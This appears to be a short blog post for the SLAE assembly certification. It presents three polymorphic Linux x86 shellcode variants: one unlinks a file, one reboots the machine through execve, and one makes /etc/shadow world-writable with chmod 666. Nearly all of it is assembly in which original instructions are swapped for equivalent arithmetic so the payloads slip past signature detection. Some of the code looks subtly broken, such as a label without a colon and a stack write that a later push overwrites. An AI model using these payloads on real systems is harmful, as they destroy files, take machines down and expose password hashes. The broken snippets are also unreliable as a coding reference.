Source: SecurityTube
I recommend check this article Polymorphic Shellcode Engine Using Spectrum Analysis
;26 bytes
;Shellcode : linux/x86 File unlinker 18 bytes + file path length
global _start
section .text
_start:
jmp one
two
pop ebx
;mov al, 0xa ;[ORIGIN]
mov al, 0x7 ;[NEW]
add al, 0x5 ;[NEW]
sub al, 0x2 ;[NEW]
int 0x80
mov al, 01
xor ebx, ebx
int 0x80
one:
call two
file: db 0xaa, 0xbb, 0xcc, 0xdd; <- your file here
Original here
;46 bytes
;Shellcode Linux x86 PUSH reboot()
global _start
section .text
_start:
xor eax, eax
push eax
;push 0x746f6f62; toob [ORIGINAL]
mov esi, 0x746f6c59 ; [NEW]
add si, 0x309 ; [NEW]
mov dword [esp-4], esi; [NEW]
sub esp, 4 ; [NEW]
push 0x65722f6e ; er/n [ORIGINAL]
push 0x6962732f; ibs/[ORIGINAL]
mov ebx, esp
push eax; 0
mov edx, esp
push ebx
mov ecx, esp
mov al, 0xb; [ORIGINAL]
mov al, 0x6; [NEW]
add al, 0x5; [NEW] 11 = NR_execve
int 0x80
Original here
;Linux/x86 - chmod() 666 /etc/shadow & exit()
;39 bytes shellcode
global _start
section .text
_start:
push ecx
mov cx, 0x1b6; = 438
;push 0x776f6461; woda [ORIGINAL]
mov esi, 0x776f6158; [NEW]
add si, 0x309 ; woda [NEW]
mov dword [esp-4], esi;[NEW]
push 0x68732f63; hs/c
push 0x74652f2f; te//
mov ebx, esp ;save pointer
push 0xf ;chmod
pop eax ;15
int 0x80
inc eax ;exit
int 0x80
Original here
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario